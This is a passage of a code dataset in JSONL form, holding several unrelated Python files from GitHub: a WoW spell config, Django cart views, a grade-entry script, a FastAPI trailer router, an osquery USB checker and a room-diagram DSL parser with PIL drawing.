icon=\"ability_shaman_ancestralguidance.jpg\", show=False)\r\nSHAMAN.add_spell( spell_id=192077, cooldown=120, duration=15, name=\"Windrush Totem\", icon=\"ability_shaman_windwalktotem.jpg\", show=False)\r\n\r\n# Defensives\r\nSHAMAN.add_spell( spell_id=21169, name=\"Reincarnation\", icon=\"spell_shaman_improvedreincarnation.jpg\", show=False)\r\nSHAMAN.add_spell( spell_id=108271, cooldown=90, duration=12, name=\"Astral Shift\", icon=\"ability_shaman_astralshift.jpg\", show=False)\r\nSHAMAN.add_buff( spell_id=337984, cooldown=90, duration=12, name=\"Vital Accretion\", icon=\"ability_accretion.jpg\", show=False) # Earth Ele HP Increase Conduit\r\n\r\n\r\n# Offensive\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=191634, cooldown=60, color=\"#00bfff\", name=\"Stormkeeper\", icon=\"ability_thunderking_lightningwhip.jpg\")\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=198067, cooldown=150, duration=30, color=\"#ffa500\", name=\"Fire Elemental\", icon=\"spell_fire_elemental_totem.jpg\")\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=192249, cooldown=150, duration=30, color=\"#64b8d9\", name=\"Storm Elemental\", icon=\"inv_stormelemental.jpg\")\r\nSHAMAN_ELEMENTAL.add_spell( spell_id=108281, cooldown=120, duration=10, color=\"#64b8d9\", name=\"Ancestral Guidance\", icon=\"ability_shaman_ancestralguidance.jpg\", spell_type=SpellType.RAID, tags=[SpellTag.RAID_CD], show=False)\r\nSHAMAN_ELEMENTAL.add_buff( spell_id=114050, color=\"#ffcb6b\", name=\"Ascendance\", icon=\"spell_fire_elementaldevastation.jpg\") # The Buff\r\n\r\n\r\nSHAMAN_ENHANCEMENT.add_spell( spell_id=51533, cooldown=120, name=\"Feral Spirit\", icon=\"spell_shaman_feralspirit.jpg\")\r\nSHAMAN_ENHANCEMENT.add_buff( spell_id=335903, cooldown=60, duration=12, color=\"#42bff5\", name=\"Doom Winds\", icon=\"ability_ironmaidens_swirlingvortex.jpg\")\r\nSHAMAN_ENHANCEMENT.add_buff( spell_id=114051, cooldown=180, color=\"#ffcb6b\", name=\"Ascendance\", icon=\"spell_fire_elementaldevastation.jpg\") # The Buff\r\n\r\n\r\nSHAMAN_RESTORATION.add_spell( spell_id=108280, cooldown=180, duration=10, name=\"Healing Tide Totem\", icon=\"ability_shaman_healingtide.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=98008, cooldown=180, duration=6, color=\"#24b385\", name=\"Spirit Link Totem\", icon=\"spell_shaman_spiritlink.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=16191, cooldown=180, duration=8, color=COL_MANA, name=\"Mana Tide Totem\", icon=\"spell_frost_summonwaterelemental.jpg\", show=False, tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=207399, cooldown=300, duration=30, color=\"#d15a5a\", name=\"Ancestral Protection Totem\", icon=\"spell_nature_reincarnation.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_spell( spell_id=198838, cooldown=60, duration=15, color=\"#a47ea6\", name=\"Earthen Wall Totem\", icon=\"spell_nature_stoneskintotem.jpg\", show=False)\r\nSHAMAN_RESTORATION.add_spell( spell_id=157153, cooldown=30, duration=15, color=\"#96d0eb\", name=\"Cloudburst Totem\", icon=\"ability_shaman_condensationtotem.jpg\", show=False)\r\n\r\n\r\nSHAMAN_RESTORATION.add_buff( spell_id=114052, cooldown=180, color=\"#ffcb6b\", name=\"Ascendance\", icon=\"spell_fire_elementaldevastation.jpg\", tags=[SpellTag.RAID_CD])\r\nSHAMAN_RESTORATION.add_buff( spell_id=378270, color=\"#ffcb6b\", name=\"Ascendance (DRE Proc)\", icon=\"inv_misc_herb_liferoot_stem.jpg\", query=False, show=False)\r\n\r\n\r\ndef split_ascendance_procs(actor: warcraftlogs_actor.BaseActor, status: str):\r\n if status != \"success\":\r\n return\r\n if not actor:\r\n return\r\n \r\n for cast in actor.casts:\r\n if cast.spell_id == 114052 and cast.duration and cast.duration < 10_000: # real = 15sec / procs = 6sec\r\n cast.spell_id = 378270\r\n\r\nwarcraftlogs_actor.BaseActor.event_actor_load.connect(split_ascendance_procs)\r\n","repo_name":"gitarrg/lorgs","sub_path":"lorgs/data/classes/shaman.py","file_name":"shaman.py","file_ext":"py","file_size_in_byte":6150,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"71"}
+{"seq_id":"34916691572","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import logout\nfrom .models import Material, Cart, CartMaterial\nfrom .forms import MaterialForm, MaterialSearchForm\n# Create your views here.\n\ndef inicio(request):\n return render(request, 'paginas/index.html')\n\ndef nosotros(request):\n return render(request, 'paginas/nosotros.html')\n\ndef servicios(request):\n return render(request, 'paginas/servicios.html')\n\ndef contacto(request):\n return render(request, 'paginas/contacto.html')\n\ndef presupuesto(request):\n material = Material.objects.all()\n session_key = request.session.session_key\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n try:\n cart = Cart.objects.get(session_key=session_key)\n except Cart.DoesNotExist:\n cart = Cart.objects.create(session_key=session_key)\n\n cart_material = CartMaterial.objects.filter(cart=cart)\n\n return render(request, 'paginas/presupuesto.html', {'material': material, 'cart_material': cart_material})\n\ndef add_to_budget(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n\n cart, created = Cart.objects.get_or_create(session_key=session_key)\n\n try: \n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n cart_material.quantity += 1\n cart_material.save()\n except CartMaterial.DoesNotExist:\n CartMaterial.objects.create(cart=cart, material=material, quantity=1)\n\n return redirect('presupuesto')\n\ndef remove_from_budget_presupuesto(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n cart = Cart.objects.get(session_key=session_key)\n\n try:\n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n if cart_material.quantity > 1:\n cart_material.quantity -= 1\n cart_material.save()\n else:\n cart_material.delete()\n except CartMaterial.DoesNotExist:\n pass\n\n return redirect('presupuesto')\n\ndef factura(request):\n session_key = request.session.session_key\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n try:\n cart = Cart.objects.get(session_key=session_key)\n except Cart.DoesNotExist:\n cart = Cart.objects.create(session_key=session_key)\n\n cart_material = CartMaterial.objects.filter(cart=cart)\n total = sum(item.material.precio * item.quantity for item in cart_material)\n\n return render(request, 'paginas/factura.html', {'cart_material': cart_material, 'total': total})\n\ndef add_to_budget_factura(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n if not session_key:\n request.session.create()\n session_key = request.session.session_key\n\n cart, created = Cart.objects.get_or_create(session_key=session_key)\n\n try: \n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n cart_material.quantity += 1\n cart_material.save()\n except CartMaterial.DoesNotExist:\n CartMaterial.objects.create(cart=cart, material=material, quantity=1)\n\n return redirect('factura') \n\ndef remove_from_budget(request, material_id):\n material = get_object_or_404(Material, pk=material_id)\n session_key = request.session.session_key\n\n cart = Cart.objects.get(session_key=session_key)\n\n try:\n cart_material = CartMaterial.objects.get(cart=cart, material=material)\n if cart_material.quantity > 1:\n cart_material.quantity -= 1\n cart_material.save()\n else:\n cart_material.delete()\n except CartMaterial.DoesNotExist:\n pass\n\n return redirect('factura')\n\n@login_required\ndef materiales(request):\n materiales = Material.objects.all()\n form = MaterialSearchForm(request.GET)\n\n if form.is_valid():\n search_term = form.cleaned_data['search_term']\n if search_term:\n materiales = materiales.filter(nombre__icontains=search_term)\n\n return render(request, 'materiales/index.html', {'materiales': materiales, 'form': form})\n@login_required\ndef crear(request):\n formulario = MaterialForm(request.POST or None, request.FILES or None)\n if formulario.is_valid():\n formulario.save()\n return redirect('materiales')\n return render(request, 'materiales/crear.html', {'formulario': formulario})\n@login_required\ndef editar(request, id):\n material = Material.objects.get(id=id)\n formulario = MaterialForm(request.POST or None, request.FILES or None, instance=material)\n if formulario.is_valid() and request.method == 'POST':\n formulario.save()\n return redirect('materiales')\n return render(request, 'materiales/editar.html', {'formulario': formulario})\n@login_required\ndef eliminar(request, id):\n material = Material.objects.get(id=id)\n material.delete()\n return redirect('materiales')\n\ndef exit(request):\n logout(request)\n return redirect('inicio')","repo_name":"Kukulkek/ConstructionWebsite","sub_path":"pagina/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"30892755355","text":"# 성적 입력 프로그램 만들기\nwith open('scorelist.txt', 'a') as f:\n # key = ''\n while True:\n try:\n key = input(\"성적을 저장할까요? [y/n] : \")\n if key == 'y' or key == 'Y':\n break\n elif key == 'n' or key == 'N':\n name = input(\"이름 입력 : \")\n kor = int(input(\"국어 점수 : \"))\n math = int(input(\"수학 점수 : \"))\n #avg = (kor + math) / 2\n\n f.write(name + ' ')\n f.write(str(kor) + ' ')\n f.write(str(math) + '\\n')\n #f.write(str(avg) + '\\n')\n else:\n print(\"잘못된 입력입니다. 다시 입력해 주세요.\")\n except ValueError:\n print(\"잘못된 입력입니다. 다시 입력해 주세요.\")\n print(\"입력을 종료합니다.\")\n\nwith open('scorelist.txt', 'r') as f:\n scorelist = f.read()\n print(scorelist)","repo_name":"kimheeje12/pyworks","sub_path":"ch08/score/score.py","file_name":"score.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"ko","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"16669305124","text":"from fastapi import APIRouter, Response ##Dividir Rutas\nfrom starlette.status import HTTP_201_CREATED, HTTP_204_NO_CONTENT\nfrom schema.trailer_schema import TrailerSchema\nfrom config.db import engine\nfrom model.trailer_model import trailers\nfrom typing import List\nimport json\n\ntrailer = APIRouter()\n\n# @trailer.get(\"/\")\n# def root():\n# return \"Hi I Am Trucks Route\"\n\n@trailer.get(\"/api/trailer\")\ndef get_trailers():\n with engine.connect() as conn:\n result = conn.execute(trailers.select()).fetchall()\n conn.commit()\n return json.dumps(result, default=str)\n\n\n@trailer.get(\"/api/trailer/{trailer_id}\")\ndef get_trailer(trailer_id: int):\n with engine.connect() as conn:\n result = conn.execute(trailers.select().where(trailers.c.id == trailer_id)).first()\n conn.commit()\n return {\n \"success\": True,\n \"data\": json.dumps(result, default=str)\n }\n \n\n@trailer.post(\"/api/trailer\", status_code=HTTP_201_CREATED)\ndef create_trailer(data_trailer: TrailerSchema):\n with engine.connect() as conn:\n new_trailer = data_trailer.model_dump()\n conn.execute(trailers.insert().values(new_trailer))\n conn.commit()\n return Response(status_code=HTTP_201_CREATED)\n\n\n@trailer.put(\"/api/trailer/{trailer_id}\")\ndef update_trailer(data_update: TrailerSchema, trailer_id: int):\n with engine.connect() as conn:\n conn.execute(trailers.update().values(trailer_type=data_update.trailer_type, number_plate=data_update.number_plate, capacity=data_update.capacity, status=data_update.status, cargo_type = data_update.cargo_type).where(trailers.c.id == trailer_id))\n conn.commit()\n\n result = conn.execute(trailers.select().where(trailers.c.id == trailer_id)).first()\n\n return {\n \"success\": True,\n \"data\": json.dumps(result, default=str)\n }\n \n@trailer.delete(\"/api/trailer/{trailer_id}\", status_code=HTTP_204_NO_CONTENT)\ndef delete_trailer(trailer_id: int):\n with engine.connect() as conn:\n conn.execute(trailers.delete().where(trailers.c.id == trailer_id))\n conn.commit()\n\n return Response(status_code=HTTP_204_NO_CONTENT)\n\n ","repo_name":"Tiwar02/transporteCarga","sub_path":"router/trailer_router.py","file_name":"trailer_router.py","file_ext":"py","file_size_in_byte":2192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"}
+{"seq_id":"27549897919","text":"import constants\nfrom analysis import SecurityIssueTypes\nfrom analysis.Recommendation import Recommendation\nfrom analysis.SecurityIssue import SecurityIssue\nfrom handler.DatabaseHandler import DatabaseHandler\nfrom handler.HostInformation import HostInformation\n\n\n# Analysis class for osquery security issues. Osquery needs to be installed on check host.\nclass OsqueryAnalyser:\n def __init__(self, configuration):\n self.configuration = configuration\n self.database_handler = DatabaseHandler(constants.MONGO_URI).mongo[constants.PI_DATABASE_NAME][constants.OSQUERY_AND_COLLECTION_NAME_USB_DEVICES]\n\n # check for unknown connected usb devices to a host.\n def check_connected_usb_devices(self, host: HostInformation):\n # get distinct serial numbers of usb devices from the past from database to identify\n distinct_usb_serials = self.database_handler.distinct('columns.serial', {'host_ip': host.ip})\n\n # find last status of usb devices\n connected_usbs = []\n for serial in distinct_usb_serials:\n entries = self.database_handler.find({'host_ip': host.ip, 'columns.serial': serial})\\\n .sort('unixTime', -1).limit(1)\n\n for entry in entries:\n # check if usb stick was added (= connected)\n if entry.get('action') == 'added':\n connected_usbs.append(entry)\n break\n\n # check for secrity issues\n unknown_usbs = self.compare_connected_usbs_with_configuration(connected_usbs)\n\n # check if empty\n if unknown_usbs:\n # description building\n usbs_display = ', '.join([usb[\"columns\"][\"model\"] for usb in connected_usbs if usb[\"columns\"][\"model\"] is not None])\n description = 'Connected USB(s): ' + usbs_display + '. Found unknown USB(s): '\n unknown_usbs_display = ', '.join([usb[\"columns\"][\"model\"] for usb in unknown_usbs if usb[\"columns\"][\"model\"] is not None])\n\n description += unknown_usbs_display\n\n # build recommendation\n recommendation = Recommendation(constants.OSQUERY,\n description,\n 'Disconnect unknown USB(s): ' + unknown_usbs_display)\n return SecurityIssue(SecurityIssueTypes.OSQUERY_CONNECTED_USBS,\n recommendation,\n False)\n else:\n # no security issues found\n print('Unknown USB check on ' + host.ip + ': Found ' + str(connected_usbs) + '! STATUS OK')\n return None\n\n # Search for usb device differences with the configuration\n def compare_connected_usbs_with_configuration(self, connected_usbs):\n # get allowlisted usb devices\n allowlisted = self.configuration['allow_list_usbs'].split(\"\\n\")\n allowlisted = [usb_name.strip() for usb_name in allowlisted]\n\n # check if in allowlist\n not_allowlisted = []\n for usb in connected_usbs:\n if not usb[\"columns\"][\"model\"] in allowlisted:\n not_allowlisted.append(usb)\n\n return not_allowlisted\n","repo_name":"Ric1234567/DigitalTwinsForIoTSecurityManagement","sub_path":"flask-backend/analysis/osquery/OsqueryAnalyser.py","file_name":"OsqueryAnalyser.py","file_ext":"py","file_size_in_byte":3170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"71"}
+{"seq_id":"28492982144","text":"#!/usr/bin/env python3\nimport sys\nfrom PIL import Image, ImageDraw\n\n\nclass Const:\n WHITE = (255,) * 3\n BLACK = (0,) * 3\n GRAY_NORMAL = (128,) * 3\n GRAY_LIGHT = (200,) * 3\n GRAY_DARK = (75,) * 3\n RED_NORMAL = (255, 0, 0)\n RED_DARK = (75, 0, 0)\n CELL_SIZE = 32\n ROOM_SIZE = 9\n\n\nclass Variable:\n def __init__(self, name, value, linen):\n self.name = name\n self.value = value\n self.linen = linen\n\n\nclass Cable:\n def __init__(self, room_uid, size, start, end, vertical):\n self.room_uid = room_uid\n self.size = int(size)\n self.start = start\n self.end = end\n self.is_vertical = vertical\n\n\nclass Box:\n def __init__(self, room_uid, name, anchor, color):\n self.room_uid = room_uid\n self.name = name\n self.anchor = anchor\n self.color = color\n\n\nclass Door:\n def __init__(self, room_uid, on, at):\n self.room_uid = room_uid\n self.on = on\n self.at = int(at)\n\n\nclass Room:\n def __init__(\n self,\n uid,\n width,\n height,\n anchor,\n boxes,\n cables,\n doors,\n ):\n self.uid = uid\n self.width = int(width)\n self.height = int(height)\n self.anchor = anchor\n self.boxes = boxes if boxes else []\n self.cables = cables if cables else []\n self.doors = doors if doors else []\n\n\ndef parseMacros(src):\n with open(src, \"r\") as f:\n lines = [line.strip() for line in f.readlines() if line]\n\n macroless_src = []\n macros = {}\n current_macro = None\n for line in lines:\n if line.startswith(\"new macro\"):\n if not \"equals\" in line:\n assert False, \"Invalid macro syntax\"\n current_macro = line.split(\" \")[2]\n if current_macro == \"new\":\n assert False, 'Macro cannot be called \"new\"'\n keywords = line.split(\" \")[1::2]\n values = line.split(\" \")[2::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n if \"params\" in zipped:\n macros[current_macro] = {\n \"lines\": [],\n \"params\": zipped[\"params\"].split(\",\")\n if \",\" in zipped[\"params\"]\n else [\n zipped[\"params\"],\n ],\n }\n else:\n macros[current_macro] = {\"lines\": [], \"params\": []}\n continue\n if line.startswith(\"stop macro \" + str(current_macro)):\n current_macro = \"\"\n continue\n if not current_macro:\n macroless_src.append(line)\n else:\n macros[current_macro][\"lines\"].append(line)\n\n macroed_src = []\n for line in macroless_src:\n for k, v in macros.items():\n if line.startswith(k):\n keywords = line.split(\" \")[1::2]\n values = line.split(\" \")[2::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n line = \"\\n\".join(v[\"lines\"])\n for p in v[\"params\"]:\n line = line.replace(\"@\" + p + \"@\", zipped[p])\n macroed_src.append(line + \"\\n\")\n\n return macroed_src\n\n\ndef parseLoops(lines):\n looped_src = []\n current_index = None\n current_times = 0\n done = False\n met_loops = 0\n i = 0\n while not done:\n if i >= len(lines):\n done = True\n continue\n line = lines[i]\n if current_index:\n l = 1\n for j in range(current_times):\n l = 1\n met_loops = 1\n while True:\n loop_line = lines[i + l]\n if loop_line.startswith(\"new loop\"):\n met_loops += 1\n if loop_line.startswith(\"stop loop\"):\n met_loops -= 1\n if loop_line.startswith(\"stop loop\") and met_loops <= 1:\n looped_src.append(loop_line)\n break\n replaced = (\n loop_line.replace(\"@\" + current_index + \"@\", str(j)) + \"\\n\"\n )\n looped_src.append(replaced)\n l += 1\n for k in range(i + l + 1, len(lines)):\n looped_src.append(lines[k])\n break\n if line.startswith(\"new loop\"):\n if not all([keyword in line for keyword in [\"times\", \"index\", \"equals\"]]):\n assert False, \"Invalid loop syntax\"\n met_loops = 1\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n if int(zipped[\"times\"]) < 0:\n assert False, \"Loop cannot run less than 0 times\"\n current_index = zipped[\"index\"]\n current_times = int(zipped[\"times\"])\n elif line.startswith(\"stop loop\"):\n current_index = None\n i += 1\n else:\n looped_src.append(line)\n i += 1\n\n return looped_src\n\n\ndef parseConditionals(lines):\n i = 0\n done = False\n keep_if = False\n inside_if = False\n inside_else = False\n conditioned_src = []\n met_conditionals = 0\n while not done:\n if i >= len(lines):\n done = True\n continue\n line = lines[i]\n if inside_if:\n if keep_if:\n l = 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if (\n any(\n [\n lines[i + l].startswith(cond)\n for cond in [\"else\", \"stop if\"]\n ]\n )\n and met_conditionals <= 1\n ):\n break\n conditioned_src.append(lines[i + l])\n l += 1\n l += 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if lines[i + l].startswith(\"stop if\") and met_conditionals <= 1:\n break\n l += 1\n for k in range(i + l + 1, len(lines)):\n conditioned_src.append(lines[k])\n else:\n l = 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if (\n any(\n [\n lines[i + l].startswith(cond)\n for cond in [\"else\", \"stop if\"]\n ]\n )\n and met_conditionals <= 1\n ):\n break\n l += 1\n l += 1\n while True:\n if lines[i + l].startswith(\"new if\"):\n met_conditionals += 1\n if lines[i + l].startswith(\"stop if\"):\n met_conditionals -= 1\n if lines[i + l].startswith(\"stop if\") and met_conditionals <= 1:\n break\n conditioned_src.append(lines[i + l])\n l += 1\n for k in range(i + l + 1, len(lines)):\n conditioned_src.append(lines[k])\n break\n if line.startswith(\"new if\"):\n if not any(\n [\n keyword in line\n for keyword in [\n \"equals\",\n ]\n ]\n ):\n assert False, \"Invalid conditional syntax\"\n met_conditionals = 1\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {k: v for k, v in zip(keywords, values)}\n inside_if = True\n inside_else = False\n if \"greater\" in zipped:\n if int(zipped[\"greater\"]) > int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"greater-equal\" in zipped:\n if int(zipped[\"greater-equal\"]) >= int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"lesser\" in zipped:\n if int(zipped[\"lesser\"]) < int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"lesser-equal\" in zipped:\n if int(zipped[\"lesser-equal\"]) <= int(zipped[\"than\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"same\" in zipped:\n if int(zipped[\"same\"]) == int(zipped[\"and\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"different\" in zipped:\n if int(zipped[\"different\"]) != int(zipped[\"and\"]):\n keep_if = True\n else:\n keep_if = False\n elif \"multiple\" in zipped:\n if int(zipped[\"multiple\"]) % int(zipped[\"of\"]) == 0:\n keep_if = True\n else:\n keep_if = False\n else:\n assert False, \"Unknown condition\"\n else:\n conditioned_src.append(line)\n i += 1\n\n return conditioned_src\n\n\ndef handleVariables(value, linen):\n global variables\n\n to_skip = []\n for variable in variables:\n for secondVar in variables:\n if (\n secondVar.name == variable.name\n and secondVar.linen > variable.linen\n and linen >= secondVar.linen\n ):\n to_skip.append(variable)\n\n for variable in variables:\n if variable in to_skip:\n continue\n if value.strip() == \"@\" + variable.name + \"@\":\n return variable.value\n\n return value\n\n\ndef setVariables(varrs):\n global variables\n variables = varrs\n\n\ndef parseRooms(src):\n global variables\n\n with open(src, \"r\") as f:\n lines = [line.strip() for line in f.readlines() if line]\n\n h = lambda v, l: handleVariables(v, l)\n ROOMS = []\n for i, line in enumerate(lines):\n if line.startswith(\"new room\"):\n if not all(\n [keyword in line for keyword in [\"id\", \"width\", \"height\", \"anchor\"]]\n ):\n assert False, 'Invalid room creation syntax: \"' + line + '\"'\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {k: h(v, i) for k, v in zip(keywords, values)}\n BOXES = parseBoxesForRoom(src, zipped[\"id\"])\n CABLES = parseCablesForRoom(src, zipped[\"id\"])\n DOORS = parseDoorsForRoom(src, zipped[\"id\"])\n ROOMS.append(\n Room(\n zipped[\"id\"],\n zipped[\"width\"],\n zipped[\"height\"],\n [int(h(n, i)) for n in h(zipped[\"anchor\"], i).split(\",\")],\n BOXES,\n CABLES,\n DOORS,\n )\n )\n\n return ROOMS\n\n\ndef parseAny(src, start, required, lambda_checks, lambda_generate, addLine=False):\n global variables\n\n with open(src, \"r\") as f:\n lines = [line.strip() for line in f.readlines() if line]\n\n OBJS = []\n for i, line in enumerate(lines):\n if line.startswith(start):\n if not all([keyword in line for keyword in required]):\n assert False, 'Invalid creation syntax: \"' + line + '\"'\n keywords = line.split(\" \")[2::2]\n values = line.split(\" \")[3::2]\n zipped = {\n k: handleVariables(v, i) if variables else v\n for k, v in zip(keywords, values)\n }\n if lambda_checks and lambda_checks[-1].__name__ == \"same_room\":\n if not lambda_checks[-1](zipped):\n continue\n for check in lambda_checks[:-1]:\n assert check(zipped), (\n 'Check failed: \"'\n + check.__name__\n + '\" with values \"'\n + str(zipped)\n + '\"'\n )\n if not addLine:\n OBJS.append(lambda_generate(zipped))\n else:\n OBJS.append(lambda_generate(zipped, i))\n\n return OBJS\n\n\ndef parseAnyForRoom(\n src, room, start, required, lambda_checks, lambda_generate, addLine=False\n):\n def same_room(zipped):\n return zipped[\"room\"] == room\n\n return parseAny(\n src, start, required, (*lambda_checks, same_room), lambda_generate, addLine\n )\n\n\ndef parseBoxesForRoom(src, room):\n start = \"new box\"\n required = [\"room\", \"name\", \"anchor\"]\n\n def correct_color(zipped):\n if not \"color\" in zipped:\n zipped[\"color\"] = \"120,120,120\"\n zipped[\"color\"] = [int(n) for n in zipped[\"color\"].split(\",\")]\n return True\n\n checks = [\n correct_color,\n ]\n\n def generate(zipped):\n return Box(\n zipped[\"room\"],\n zipped[\"name\"],\n [int(n) for n in zipped[\"anchor\"].split(\",\")],\n zipped[\"color\"],\n )\n\n return parseAnyForRoom(src, room, start, required, checks, generate)\n\n\ndef parseDoorsForRoom(src, room):\n start = \"new door\"\n required = [\"room\", \"on\", \"at\"]\n\n def validate_positions(zipped):\n if zipped[\"on\"] not in [\"left\", \"right\", \"top\", \"bottom\"]:\n return False\n return True\n\n checks = [\n validate_positions,\n ]\n\n def generate(zipped):\n return Door(zipped[\"room\"], zipped[\"on\"], zipped[\"at\"])\n\n return parseAnyForRoom(src, room, start, required, checks, generate)\n\n\ndef parseCablesForRoom(src, room):\n start = \"new cable\"\n required = [\"room\", \"type\", \"size\", \"from\", \"to\"]\n\n def validate_type(zipped):\n if zipped[\"type\"] not in [\"V\", \"H\"]:\n return False\n return True\n\n def validate_malformed_cables(zipped):\n if zipped[\"type\"] == \"V\":\n if [int(n) for n in zipped[\"from\"].split(\",\")][0] != [\n int(n) for n in zipped[\"to\"].split(\",\")\n ][0]:\n return False\n else:\n if [int(n) for n in zipped[\"from\"].split(\",\")][1] != [\n int(n) for n in zipped[\"to\"].split(\",\")\n ][1]:\n return False\n return True\n\n def validate_size(zipped):\n if int(zipped[\"size\"]) <= 0:\n return False\n return True\n\n checks = [validate_type, validate_malformed_cables, validate_size]\n\n def generate(zipped):\n return Cable(\n zipped[\"room\"],\n zipped[\"size\"],\n [int(n) for n in zipped[\"from\"].split(\",\")],\n [int(n) for n in zipped[\"to\"].split(\",\")],\n zipped[\"type\"] == \"V\",\n )\n\n return parseAnyForRoom(src, room, start, required, checks, generate)\n\n\ndef parseVariables(src):\n start = \"set var\"\n required = [\"name\", \"value\"]\n checks = []\n\n def generate(zipped, linen):\n return Variable(zipped[\"name\"], zipped[\"value\"], linen)\n\n return parseAny(src, start, required, checks, generate, True)\n\n\ndef parseMath(src):\n start = \"do math\"\n required = [\"by\", \"into\"]\n\n def validate_operators(zipped):\n if not any([op in zipped for op in [\"times\", \"divide\", \"sum\", \"subtract\"]]):\n return False\n return True\n\n checks = [\n validate_operators,\n ]\n\n def generate(zipped, linen):\n global variables\n if \"times\" in zipped:\n variables.append(\n Variable(\n zipped[\"into\"], int(zipped[\"times\"]) * int(zipped[\"by\"]), linen\n )\n )\n elif \"divide\" in zipped:\n variables.append(\n Variable(\n zipped[\"into\"], int(zipped[\"divide\"]) // int(zipped[\"by\"]), linen\n )\n )\n elif \"sum\" in zipped:\n variables.append(\n Variable(zipped[\"into\"], int(zipped[\"sum\"]) + int(zipped[\"by\"]), linen)\n )\n else:\n variables.append(\n Variable(\n zipped[\"into\"], int(zipped[\"subtract\"]) - int(zipped[\"by\"]), linen\n )\n )\n\n return parseAny(src, start, required, checks, generate, True)\n\n\ndef drawRooms(rooms):\n for room in rooms:\n drawRoom(room)\n drawFullRoom(rooms)\n\n\ndef drawFullRoom(rooms):\n maxX = -1\n maxXwidth = -1\n maxY = -1\n maxYheight = -1\n for room in rooms:\n if room.anchor[0] >= maxX:\n maxX = room.anchor[0]\n if room.width >= maxXwidth:\n maxXwidth = room.width\n if room.anchor[1] >= maxY:\n maxY = room.anchor[1]\n if room.height >= maxYheight:\n maxYheight = room.height\n\n image = Image.new(\n mode=\"RGB\",\n size=(\n (maxX + maxXwidth) * Const.ROOM_SIZE * Const.CELL_SIZE,\n (maxY + maxYheight) * Const.ROOM_SIZE * Const.CELL_SIZE,\n ),\n color=Const.WHITE,\n )\n for room in rooms:\n image.paste(\n Image.open(str(room.uid) + \".png\", \"r\"),\n (\n room.anchor[0] * Const.ROOM_SIZE * Const.CELL_SIZE,\n room.anchor[1] * Const.ROOM_SIZE * Const.CELL_SIZE,\n ),\n )\n draw = ImageDraw.Draw(image)\n for room in rooms:\n width = room.width * Const.ROOM_SIZE * Const.CELL_SIZE\n height = room.height * Const.ROOM_SIZE * Const.CELL_SIZE\n x = room.anchor[0] * Const.ROOM_SIZE * Const.CELL_SIZE\n y = room.anchor[1] * Const.ROOM_SIZE * Const.CELL_SIZE\n for door in room.doors:\n o = door.on\n a = door.at\n if door.on == \"left\":\n draw.line(\n (\n (x, (a - 1) * Const.CELL_SIZE),\n (x, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n elif door.on == \"right\":\n draw.line(\n (\n (width + x, (a - 1) * Const.CELL_SIZE),\n (width + x, (a + 1) * Const.CELL_SIZE),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n elif door.on == \"top\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, y),\n ((a + 1) * Const.CELL_SIZE, y),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n elif door.on == \"bottom\":\n draw.line(\n (\n ((a - 1) * Const.CELL_SIZE, height + y),\n ((a + 1) * Const.CELL_SIZE, height + y),\n ),\n fill=Const.GRAY_LIGHT,\n width=6,\n )\n image.save(\"full.png\")\n\n\ndef drawRoom(room):\n # inverted because of PIL's coordinate system\n height = room.width * Const.ROOM_SIZE * Const.CELL_SIZE\n width = room.height * Const.ROOM_SIZE * Const.CELL_SIZE\n\n step_count = height / Const.CELL_SIZE\n image = Image.new(mode=\"RGB\", size=(height, width), color=Const.WHITE)\n draw = ImageDraw.Draw(image)\n y_start = 0\n y_end = image.height\n step_size = int(image.width / step_count)\n for x in range(0, image.width, 